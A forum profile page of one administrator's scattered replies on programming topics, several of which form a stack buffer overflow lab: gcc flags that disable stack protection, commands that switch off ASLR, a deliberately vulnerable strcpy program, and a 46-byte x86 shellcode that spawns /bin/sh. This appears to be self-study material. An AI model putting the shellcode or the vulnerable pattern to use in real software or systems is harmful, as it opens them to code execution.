Forum Replies Created
-
AuthorPosts
-
Founder & CEO, EM @QUE.COM
KeymasterComparison of JavaScript frameworks
https://en.wikipedia.org/wiki/Comparison_of_JavaScript_frameworksFounder & CEO, EM @QUE.COM
KeymasterFounder & CEO, EM @QUE.COM
Keymaster1. gcc -o example example.c // compile your program
2. gdb ./example // run GNU Debug
3. (gdb) disas main // run disassembly main
take note of the address, this is for 64bit.Now for 32bits compile code.
gcc -o example -fno-stack-protector -m32 -z execstack example.c // not working
gcc -o example -m32 example.c
Command: gcc -m32 geek.c -o geekfatal error: bits/predefs.h: No such file or directory
Then it indicates that a standard library of gcc is been missing. In that case you must install gcc-multlib by using the following command:For C language:
sudo apt-get install gcc-multilibalias python=python3 // to set python to python3
to anyone getting :
Cannot insert breakpoint 1.
Cannot access memory at address xxxxxxthe displayed memory addresses when you run disassemble main at first are not correct .
to get the correct ones run the commands as follow:gdb ./example
run aaaaawhatever
disassemble main or disas mainnow you get the correct ones copy it and quit gdb
gdb ./example
break *the address you copiednow running the command (run $(python ……..) will work.
Founder & CEO, EM @QUE.COM
KeymasterNice
Founder & CEO, EM @QUE.COM
KeymasterAnother good tutorial using GDB program.
NOTE: If this tutorial is not working it is likely that you have aslr enabled. To disable it run the following command in your terminal
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished I strongly recommend you turn it back on with the command
echo 2 | sudo tee /proc/sys/kernel/randomize_va_spaceThe 46 byte shellcode (x86*) used in this program is
“\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”# Sample buffer overflow program.
Save to example.c program#include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ char buf[256]; strcpy(buf, argv[1]); printf("%s\n", buf); return 0; }-
This reply was modified 5 years, 2 months ago by
Founder & CEO, EM @QUE.COM.
Founder & CEO, EM @QUE.COM
KeymasterAdditional resources.
http://www.brendangregg.com/blog/2016-08-09/gdb-example-ncurses.html (GDB)
http://phrack.org/issues/49/14.html (Buffer Overflow Concepts)
https://www.cprogramming.com/gdb.html (GDB)
https://docs.python.org/3/tutorial/
https://www.hacksplaining.com ( For SQL injection / Javascript / XSS/ CSRF Vulnerabilities)Founder & CEO, EM @QUE.COM
Keymaster// delete branch locally
git branch -d localBranchName// delete branch remotely
git push origin –d remoteBranchName-
This reply was modified 4 years, 5 months ago by
Founder & CEO, EM @QUE.COM.
Founder & CEO, EM @QUE.COM
KeymasterA Homemade Raspberry Pi Self Balancing Robot
Founder & CEO, EM @QUE.COM
KeymasterWhat skill sets do you want in your Cyber Hunting Team?
Founder & CEO, EM @QUE.COM
KeymasterData Wrangling basic process is …
– Discovering
– Structuring
– Cleaning
– Enrichment
– ValidatingFounder & CEO, EM @QUE.COM
KeymasterI just found this add-on. Anyone use it?
TabNine uses deep learning to help you write code faster.
https://www.tabnine.com/Founder & CEO, EM @QUE.COM
KeymasterUpdate CodeTable https://code.hackerearth.com is shutting down.
Founder & CEO, EM @QUE.COM
KeymasterOther cool tools to play
Olly Debuy
http://www.ollydbg.de/IDAPro – Freeware download.
https://www.hex-rays.com/products/ida/support/download_freeware.shtmlGot other tools, share it with us. Thanks.
Founder & CEO, EM @QUE.COM
KeymasterYou can easily login using your Google, Apple or WordPress account.
Let us know if that works.December 26, 2019 at 9:26 pm in reply to: We provide support for QUE.com, Yehey.com and other joint ventures. #31345Founder & CEO, EM @QUE.COM
KeymasterYou can easily login using your Google, Apple or WordPress account.
Let us know if that works. -
This reply was modified 5 years, 2 months ago by
-
AuthorPosts
